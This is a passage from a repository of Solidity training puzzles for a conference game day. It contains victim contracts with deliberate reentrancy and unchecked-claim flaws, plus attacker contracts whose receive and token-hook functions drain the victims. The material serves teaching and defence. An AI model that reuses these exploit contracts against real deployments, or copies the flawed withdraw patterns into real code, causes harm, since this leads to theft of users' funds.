├── .gitignore ├── .prettierignore ├── .prettierrc ├── README.md ├── contracts ├── .DS_Store ├── puzzle1 │ ├── Attacker1.sol │ ├── Victim1.sol │ └── interface │ │ └── IVictim.sol ├── puzzle2 │ ├── Attacker2.sol │ ├── Victim2.sol │ ├── interface │ │ └── IVictim.sol │ └── token │ │ └── ERC777TestToken.sol └── puzzle3 │ ├── Victim3.sol │ ├── interface │ ├── IDistributor.sol │ └── IVictim.sol │ └── miscs │ ├── Distributor.sol │ ├── Token.sol │ └── Whitelistable.sol ├── hardhat.config.js ├── package.json ├── remix-compiler.config.js ├── tests ├── js_tests │ ├── puzzle1.test.js │ └── puzzle2.test.js └── solidity_tests │ ├── puzzle1_test.sol │ └── puzzle2_test.sol ├── tx_records ├── README.md ├── puzzle1.json └── puzzle2.json └── yarn.lock /.gitignore: -------------------------------------------------------------------------------- 1 | # Logs 2 | logs 3 | *.log 4 | npm-debug.log* 5 | yarn-debug.log* 6 | yarn-error.log* 7 | lerna-debug.log* 8 | .pnpm-debug.log* 9 | 10 | ## hardhat temp files 11 | cache/ 12 | artifacts/ 13 | 14 | # Diagnostic reports (https://nodejs.org/api/report.html) 15 | report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json 16 | 17 | # Runtime data 18 | pids 19 | *.pid 20 | *.seed 21 | *.pid.lock 22 | 23 | # Directory for instrumented libs generated by jscoverage/JSCover 24 | lib-cov 25 | 26 | # Coverage directory used by tools like istanbul 27 | coverage 28 | *.lcov 29 | 30 | # nyc test coverage 31 | .nyc_output 32 | 33 | # Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files) 34 | .grunt 35 | 36 | # Bower dependency directory (https://bower.io/) 37 | bower_components 38 | 39 | # node-waf configuration 40 | .lock-wscript 41 | 42 | # Compiled binary addons (https://nodejs.org/api/addons.html) 43 | build/Release 44 | 45 | # Dependency directories 46 | node_modules/ 47 | jspm_packages/ 48 | 49 | # Snowpack dependency directory (https://snowpack.dev/) 50 | web_modules/ 51 | 52 | # TypeScript cache 53 | *.tsbuildinfo 54 | 55 | # Optional 
npm cache directory 56 | .npm 57 | 58 | # Optional eslint cache 59 | .eslintcache 60 | 61 | # Optional stylelint cache 62 | .stylelintcache 63 | 64 | # Microbundle cache 65 | .rpt2_cache/ 66 | .rts2_cache_cjs/ 67 | .rts2_cache_es/ 68 | .rts2_cache_umd/ 69 | 70 | # Optional REPL history 71 | .node_repl_history 72 | 73 | # Output of 'npm pack' 74 | *.tgz 75 | 76 | # Yarn Integrity file 77 | .yarn-integrity 78 | 79 | # dotenv environment variable files 80 | .env 81 | .env.development.local 82 | .env.test.local 83 | .env.production.local 84 | .env.local 85 | 86 | # parcel-bundler cache (https://parceljs.org/) 87 | .cache 88 | .parcel-cache 89 | 90 | # Next.js build output 91 | .next 92 | out 93 | 94 | # Nuxt.js build / generate output 95 | .nuxt 96 | dist 97 | 98 | # Gatsby files 99 | .cache/ 100 | # Comment in the public line in if your project uses Gatsby and not Next.js 101 | # https://nextjs.org/blog/next-9-1#public-directory-support 102 | # public 103 | 104 | # vuepress build output 105 | .vuepress/dist 106 | 107 | # vuepress v2.x temp and cache directory 108 | .temp 109 | .cache 110 | 111 | # Docusaurus cache and generated files 112 | .docusaurus 113 | 114 | # Serverless directories 115 | .serverless/ 116 | 117 | # FuseBox cache 118 | .fusebox/ 119 | 120 | # DynamoDB Local files 121 | .dynamodb/ 122 | 123 | # TernJS port file 124 | .tern-port 125 | 126 | # Stores VSCode versions used for testing VSCode extensions 127 | .vscode-test 128 | 129 | # yarn v2 130 | .yarn/cache 131 | .yarn/unplugged 132 | .yarn/build-state.yml 133 | .yarn/install-state.gz 134 | .pnp.* 135 | 136 | # remix 137 | .deps 138 | */artifacts -------------------------------------------------------------------------------- /.prettierignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | artifacts 3 | cache 4 | coverage* 5 | gasReporterOutput.json 6 | types 7 | typechain 8 | .deps 
-------------------------------------------------------------------------------- /.prettierrc: -------------------------------------------------------------------------------- 1 | { 2 | "printWidth": 140, 3 | "tabWidth": 2, 4 | "useTabs": true, 5 | "overrides": [ 6 | { 7 | "files": "*.sol", 8 | "options": { 9 | "printWidth": 100, 10 | "tabWidth": 2, 11 | "useTabs": true, 12 | "singleQuote": false, 13 | "bracketSpacing": true, 14 | "explicitTypes": "always" 15 | } 16 | } 17 | ] 18 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Solidity Puzzles 2 | 3 | ``` 4 | __ __ _ _ _____ _ _ _ 5 | \ \ / / (_| | / ____| | | | | (_) 6 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 7 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 8 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 9 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 10 | __/ | 11 | |___/ 12 | 13 | Verilog Solutions Inc. https://www.verilog.solutions 14 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 15 | validator operations, venture investment, and incubation. 16 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 17 | ``` 18 | 19 | This repo includes three smart contract puzzles written for Remix Game Day in DevConnect Amsterdam. 20 | 21 | ## Who Are They? 22 | 23 | - **Puzzle One**: Yesterday Once More 24 | Time traveled back to 2016, you are the one who hard-forks the Ethereum blockchain. 25 | 26 | - **Puzzle Two**: Safe and Sound 27 | No worry, our transfer is secured. 28 | 29 | > Puzzle 3 is an extra puzzle. Try to solve it and write the unit tests yourself! 30 | 31 | ## Play with Remix 32 | 33 | ### 1 Load files in remix 34 | 35 | - Load files using `dGit` plugin 36 | 1. 
Open [remix](https://remix.ethereum.org/); 37 | 2. Enable `dGit` plugin in the `PLUGIN MANAGER` tab; 38 | 3. In `dGit` > `CLONE, PUSH, PULL & REMOTES` > `CLONE`, enter the URL of this GitHub repo, then click `clone`; 39 | 4. Go to `FILE EXPLORERS` > drag down `workspace` > select the latest workspace. 40 | 41 | ### 2 Play Transaction Recordings 42 | 43 | > Remix has a cool feature. It can record transactions as a scenario file, and all the saved transactions can be executed in one click. 44 | 45 | We record the transactions, which include the contract deployments and attack executions. After playing the recording, you will see a series of transactions appear automatically in the Remix console. 46 | 47 | 1. Open a scenario file `tx_records/puzzle*.json` 48 | 2. Go to `DEPLOY & RUN TRANSACTIONS` > `Transactions recorded` 49 | 3. Click the play button 50 | 51 | ### 3 Explore the Remix Debugger 52 | 53 | Inside the Remix console, you can see all the transactions. Pick one transaction and click the `Debug` button. 54 | 55 | You can pick the attacking transaction and debug it to see exactly what happens inside the exploit. 56 | 57 | ### 4 Run Tests & Try to Fix Bugs 58 | 59 | We have prepared two kinds of tests. Try running the tests and fixing the bugs. 60 | 61 | 1. Solidity tests for Remix unit testing (`tests/solidity_tests/*`) 62 | 63 | You can run them with the `SOLIDITY UNIT TESTING` plugin (you need to activate it first inside the `PLUGIN MANAGER`). 64 | 65 | 2. JavaScript unit tests, which can be run on both Remix and Hardhat (`tests/js_tests/*`) 66 | 67 | - Run on Remix (make sure you have compiled all the contracts first). 68 | 69 | Just right-click the test file in the file explorer and choose `run`. 
70 | 71 | - run with hardhat locally with `yarn hardhat test` 72 | 73 | -------------------------------------------------------------------------------- /contracts/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Verilog-Solutions/solidity-puzzles/13a849c698aac73d537b108e489d75c8e1b3a4b5/contracts/.DS_Store -------------------------------------------------------------------------------- /contracts/puzzle1/Attacker1.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 
16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | import "./interface/IVictim.sol"; 20 | 21 | /// @title Attacker1 22 | /// @notice Attacker contract for puzzle 1 23 | /// @author Verilog Solutions 24 | contract Attacker1 { 25 | /** @dev The IVictim instance this fixture calls; set once in the constructor. */ IVictim public victim; 26 | 27 | /** @param victimAddr Address stored as `victim`. */ constructor(address victimAddr) { 28 | victim = IVictim(victimAddr); 29 | } 30 | 31 | /** @notice Forwards msg.value to victim.deposit(), then calls victim.withdraw() with this contract as the payee. */ function attack() external payable { 32 | victim.deposit{ value: msg.value }(); 33 | victim.withdraw(address(this)); 34 | } 35 | 36 | /** @dev Runs whenever this contract receives plain ether. While the victim holds more than 0.1 ether it calls victim.withdraw() again from inside the payment, which is the reentrancy pattern this puzzle demonstrates; the nested call only pays out if the victim has not yet cleared the caller's recorded balance. */ receive() external payable { 37 | if (address(victim).balance > 0.1 ether) { 38 | victim.withdraw(address(this)); 39 | } 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /contracts/puzzle1/Victim1.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | import "./interface/IVictim.sol"; 20 | 21 | /// @title Victim1 22 | /// @notice Victim contract for puzzle 1 23 | /// @author Verilog Solutions 24 | contract Victim1 is IVictim { 25 | mapping(address => uint256) public amounts; 26 | 27 | //payable constructor. 
send some ether to this contract during construction 28 | constructor() payable {} 29 | 30 | /** @notice Adds msg.value to the caller's entry in `amounts`. */ function deposit() external payable override { 31 | amounts[msg.sender] += msg.value; 32 | } 33 | 34 | /** @notice Sends the caller's recorded balance to `to`, then sets that balance to zero. @dev Deliberate puzzle flaw (reentrancy): the external call below runs before `amounts[msg.sender]` is cleared, so a contract payee can call withdraw() again from its receive function and be paid the same recorded amount. A hardened version zeroes the balance before the call (checks-effects-interactions) or adds a reentrancy guard. */ function withdraw(address to) external override { 35 | uint256 amount = amounts[msg.sender]; 36 | (bool success, ) = to.call{ value: amount }(""); 37 | require(success, "Victim1:: Withdraw failed."); 38 | amounts[msg.sender] = 0; 39 | } 40 | } 41 | -------------------------------------------------------------------------------- /contracts/puzzle1/interface/IVictim.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 
16 | */ 17 | 18 | pragma solidity ^0.8.0; 19 | 20 | /** @notice Interface of the puzzle 1 victim: a payable deposit and a withdrawal paid to an address chosen by the caller. */ interface IVictim { 21 | function deposit() external payable; 22 | 23 | function withdraw(address to) external; 24 | } 25 | -------------------------------------------------------------------------------- /contracts/puzzle2/Attacker2.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 
16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | import "@openzeppelin/contracts/token/ERC777/IERC777Recipient.sol"; 20 | import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; 21 | import "./interface/IVictim.sol"; 22 | 23 | /// @title Attacker2 24 | /// @notice Attacker contract for puzzle 2 25 | /// @author Verilog Solutions 26 | contract Attacker2 is IERC777Recipient { 27 | IVictim public victim; 28 | IERC20 public token; 29 | 30 | /** @param victimAddr Address stored as `victim`. @param tokenAddr Address stored as `token`. */ constructor(address victimAddr, address tokenAddr) { 31 | victim = IVictim(victimAddr); 32 | token = IERC20(tokenAddr); 33 | } 34 | 35 | /** @notice Pulls `amount` tokens from msg.sender (which needs a prior allowance for this contract), approves the victim for them, deposits them and then calls victim.withdraw() with this contract as recipient. */ function attack(uint256 amount) external { 36 | token.transferFrom(msg.sender, address(this), amount); 37 | token.approve(address(victim), amount); 38 | victim.deposit(amount); 39 | victim.withdraw(address(this)); 40 | } 41 | 42 | /** @dev Token-receipt hook; `from` is the only argument it reads. Transfers that do not come from `victim` are ignored. For a transfer from the victim it calls victim.withdraw() again while the victim's token balance is above 1e18, i.e. it re-enters the victim from inside the victim's own token transfer. This is the reentrancy pattern puzzle 2 demonstrates. */ function tokensReceived( 43 | address, 44 | address from, 45 | address, 46 | uint256, 47 | bytes calldata, 48 | bytes calldata 49 | ) external override { 50 | // mute the compiler warnings 51 | // operator; 52 | // from; 53 | // to; 54 | // amount; 55 | // userData; 56 | // operatorData; 57 | 58 | if (from != address(victim)) { 59 | return; 60 | } 61 | // 10 ** 18 in value == 1 AGT 62 | if (token.balanceOf(address(from)) > 1e18) { 63 | victim.withdraw(address(this)); 64 | } 65 | } 66 | } 67 | -------------------------------------------------------------------------------- /contracts/puzzle2/Victim2.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog 
Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | import "./interface/IVictim.sol"; 20 | import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; 21 | import "@openzeppelin/contracts/token/ERC777/IERC777Recipient.sol"; 22 | 23 | /// @title Victim2 24 | /// @notice Victim contract for puzzle 2 25 | /// @author Verilog Solutions 26 | contract Victim2 is IVictim, IERC777Recipient { 27 | IERC20 public token; 28 | mapping(address => uint256) public amounts; 29 | 30 | /** @param tokenAddr Address stored as `token`. */ constructor(address tokenAddr) { 31 | token = IERC20(tokenAddr); 32 | // need some initial fund (in terms of AbraveToken) to be exploited 33 | } 34 | 35 | /** @notice Token-receipt hook: credits `amount` to `amounts[from]`. @dev NOTE(review): msg.sender is not compared with `token`, so the credit is not tied to an actual transfer of this token; a hardened version would accept the call only from the token contract, e.g. require(msg.sender == address(token)). */ function tokensReceived( 36 | address operator, 37 | address from, 38 | address to, 39 | uint256 amount, 40 | bytes calldata userData, 41 | bytes calldata operatorData 42 | ) external override { 43 | // omit all the parameter unused warnings 44 | operator; 45 | to; 46 | userData; 47 | operatorData; 48 | 49 | amounts[from] += amount; 50 | } 51 | 52 | /** @notice Pulls `amount` of `token` from the caller into this contract. @dev The credit to `amounts` is not made here; it relies on the token calling tokensReceived() during the transfer (see the commented-out line). The return value of transferFrom is not checked. */ function deposit(uint256 amount) external override { 53 | token.transferFrom(msg.sender, address(this), amount); 54 | //amounts[msg.sender] += amount; // this is done when tokensReceived() 55 | } 56 | 57 | /** @notice Transfers the caller's recorded balance to `recipient`, then sets that balance to zero. @dev Deliberate puzzle flaw (reentrancy): with a token that calls a recipient hook during transfer(), control reaches `recipient` before `amounts[msg.sender]` is cleared, so the same recorded balance can be withdrawn again from inside the hook. A hardened version clears the balance before transferring (checks-effects-interactions) or adds a reentrancy guard. */ function withdraw(address recipient) external override { 58 | uint256 amount = amounts[msg.sender]; 59 | token.transfer(recipient, amount); 60 | amounts[msg.sender] = 0; 61 | } 62 | } 63 | -------------------------------------------------------------------------------- /contracts/puzzle2/interface/IVictim.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 
5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity ^0.8.0; 19 | 20 | /** @notice Interface of the puzzle 2 victim: a deposit of `amount` and a withdrawal paid to an address chosen by the caller. */ interface IVictim { 21 | function deposit(uint256 amount) external; 22 | 23 | function withdraw(address recipient) external; 24 | } 25 | -------------------------------------------------------------------------------- /contracts/puzzle2/token/ERC777TestToken.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 
16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | 20 | import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; 21 | import "@openzeppelin/contracts/utils/Address.sol"; 22 | import "@openzeppelin/contracts/token/ERC777/IERC777Recipient.sol"; 23 | 24 | /// @title ERC777TestToken 25 | /// @notice simple version of ERC777. Do not use it in productions 26 | /// @author Verilog Solutions 27 | contract ERC777TestToken is ERC20 { 28 | /** @param initialSupply Amount minted to the deployer. */ constructor(uint256 initialSupply) ERC20("ERC777 Test Token", "Token") { 29 | // mint some initial supply 30 | _mint(msg.sender, initialSupply); 31 | } 32 | 33 | // buy token with ether 34 | /** @notice Mints msg.value token units to `to` (1:1 with the wei sent). */ function buy(address to) external payable { 35 | // let's do a 1:1 exchange from eth to token 36 | _mint(to, msg.value); 37 | } 38 | 39 | /** @notice ERC20 transfer followed by the recipient hook in callAfterTransfer(). */ function transfer(address _to, uint256 _value) public override returns (bool) { 40 | require(super.transfer(_to, _value)); 41 | callAfterTransfer(msg.sender, _to, _value); 42 | return true; 43 | } 44 | 45 | /** @notice ERC20 transferFrom followed by the recipient hook in callAfterTransfer(). */ function transferFrom( 46 | address _from, 47 | address _to, 48 | uint256 _value 49 | ) public override returns (bool) { 50 | require(super.transferFrom(_from, _to, _value)); 51 | callAfterTransfer(_from, _to, _value); 52 | return true; 53 | } 54 | 55 | /** @dev If `_to` is a contract, calls its tokensReceived() with operator address(0) and empty data, after the balances have already moved. This hands control to the recipient in the middle of the caller's transfer, so a contract that uses this token must finish its own state updates before it transfers. The hook is called directly, so a contract recipient that cannot handle tokensReceived() makes the whole transfer revert. */ function callAfterTransfer( 56 | address _from, 57 | address _to, 58 | uint256 _value 59 | ) internal { 60 | if (Address.isContract(_to)) { 61 | IERC777Recipient(_to).tokensReceived( 62 | address(0), 63 | _from, 64 | _to, 65 | _value, 66 | new bytes(0), 67 | new bytes(0) 68 | ); 69 | } 70 | } 71 | } 72 | -------------------------------------------------------------------------------- /contracts/puzzle3/Victim3.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| 
|/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; 20 | import "./interface/IVictim.sol"; 21 | import "./interface/IDistributor.sol"; 22 | 23 | /// @title Victim3 24 | /// @notice Victim contract for puzzle 3 25 | /// @author Verilog Solutions 26 | contract Victim3 is IVictim { 27 | IERC20 public token; 28 | mapping(address => uint256) public amounts; 29 | 30 | /** @param tokenAddr Token stored as `token`. */ constructor(IERC20 tokenAddr) { 31 | token = IERC20(tokenAddr); 32 | } 33 | 34 | /** @notice Pulls `amount` of `token` from the caller into this contract and adds it to the caller's entry in `amounts`. @dev The return value of transferFrom is not checked. */ function deposit(uint256 amount) external override { 35 | token.transferFrom(msg.sender, address(this), amount); 36 | amounts[msg.sender] += amount; 37 | } 38 | 39 | /** @notice Asks `distributor` to send the caller's recorded amount to `recipient`. @dev NOTE(review): two things to check in this function. The statement that would reset `amounts[msg.sender]` is commented out, so the recorded amount is unchanged after a claim. And `distributor` is supplied by the caller and is called without being compared with a known distributor address. A hardened version clears the balance before the external call and calls only a distributor fixed at deployment. */ function claim(IDistributor distributor, address recipient) external override { 40 | uint256 amount = amounts[msg.sender]; 41 | distributor.distribute(recipient, amount); 42 | // amounts[msg.sender] = 0; 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /contracts/puzzle3/interface/IDistributor.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | _ _ _ _ 4 | | | | | (_) | 5 | | | | |___ ____ _| | ___ ____ 6 | \ \/ / _ )/ ___) | |/ _ \ / _ | 7 | \ ( (/ /| | | | | |_| ( ( | | 8 | _ \/ \____)_| |_|_|\___/ \_|| | 9 | | | | | _ (_____| 10 | \ \ ___ | |_ _| |_ (_) ___ ____ ___ 11 | \ \ / _ \| | | | | _)| |/ _ \| _ \ /___) 12 | _____) ) |_| | | |_| | |__| | |_| | | | 
|___ | 13 | (______/ \___/|_|\____|\___)_|\___/|_| |_(___/ 14 | 15 | Verilog Solutions Inc. https://www.verilog.solutions 16 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 17 | validator operations, venture investment, and incubation. 18 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 19 | */ 20 | 21 | pragma solidity 0.8.6; 22 | 23 | /** @notice Payout interface implemented by Distributor (miscs/Distributor.sol). The interface itself carries no access control; that is left to the implementation. */ interface IDistributor { 24 | function distribute(address recipient, uint256 amount) external; 25 | } 26 | -------------------------------------------------------------------------------- /contracts/puzzle3/interface/IVictim.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | _ _ _ _ 4 | | | | | (_) | 5 | | | | |___ ____ _| | ___ ____ 6 | \ \/ / _ )/ ___) | |/ _ \ / _ | 7 | \ ( (/ /| | | | | |_| ( ( | | 8 | _ \/ \____)_| |_|_|\___/ \_|| | 9 | | | | | _ (_____| 10 | \ \ ___ | |_ _| |_ (_) ___ ____ ___ 11 | \ \ / _ \| | | | | _)| |/ _ \| _ \ /___) 12 | _____) ) |_| | | |_| | |__| | |_| | | | |___ | 13 | (______/ \___/|_|\____|\___)_|\___/|_| |_(___/ 14 | 15 | Verilog Solutions Inc. https://www.verilog.solutions 16 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 17 | validator operations, venture investment, and incubation. 18 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 
19 | */ 20 | 21 | pragma solidity 0.8.6; 22 | import "./IDistributor.sol"; 23 | 24 | /** @notice Interface of the puzzle 3 victim. Note that claim() receives the distributor to call as an argument from the caller. */ interface IVictim { 25 | function deposit(uint256 amount) external; 26 | 27 | function claim(IDistributor distributor, address recipient) external; 28 | } 29 | -------------------------------------------------------------------------------- /contracts/puzzle3/miscs/Distributor.sol: -------------------------------------------------------------------------------- 1 | // SPDX-License-Identifier: GPL-3.0 2 | /** Do NOT use this code in production ** 3 | __ __ _ _ _____ _ _ _ 4 | \ \ / / (_| | / ____| | | | | (_) 5 | \ \ / ___ _ __ _| | ___ __ _ | (___ ___ | |_ _| |_ _ ___ _ __ ___ 6 | \ \/ / _ | '__| | |/ _ \ / _` | \___ \ / _ \| | | | | __| |/ _ \| '_ \/ __| 7 | \ | __| | | | | (_) | (_| | ____) | (_) | | |_| | |_| | (_) | | | \__ \ 8 | \/ \___|_| |_|_|\___/ \__, | |_____/ \___/|_|\__,_|\__|_|\___/|_| |_|___/ 9 | __/ | 10 | |___/ 11 | 12 | Verilog Solutions Inc. https://www.verilog.solutions 13 | Verilog is a full-stack web3 security firm, covering smart contract auditing, 14 | validator operations, venture investment, and incubation. 15 | Glad to prepare and present the materials for Game Day Remix in DevConnect Amsterdam! 
16 | */ 17 | 18 | pragma solidity 0.8.6; 19 | 20 | import "@openzeppelin/contracts/access/Ownable.sol"; 21 | import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; 22 | import { Whitelistable } from "./Whitelistable.sol"; 23 | import { IDistributor } from "../interface/IDistributor.sol"; 24 | 25 | /// @title Distributor 26 | /// @notice A Distributor to distribute tokens 27 | /// @author Verilog Solutions 28 | contract Distributor is IDistributor, Ownable, Whitelistable { 29 | IERC20 public token; 30 | 31 | /** @param tokenAddr Token stored as `token`. */ constructor(IERC20 tokenAddr) { 32 | token = IERC20(tokenAddr); 33 | } 34 | 35 | /** @notice Transfers `amount` of `token` from this contract's own balance to `recipient`; callable only by whitelisted addresses. @dev The whitelisted caller is trusted completely: there is no per-recipient accounting or cap in this function, so any limit on payouts has to be enforced by the caller. The return value of transfer is not checked. */ function distribute(address recipient, uint256 amount) 36 | external 37 | override 38 | onlyWhitelist 39 | //only the Victim contract address is in whitelist 40 | { 41 | token.transfer(recipient, amount); 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /contracts/puzzle3/miscs/Token.sol: -------------------------------------------------------------------------------- 1 | // 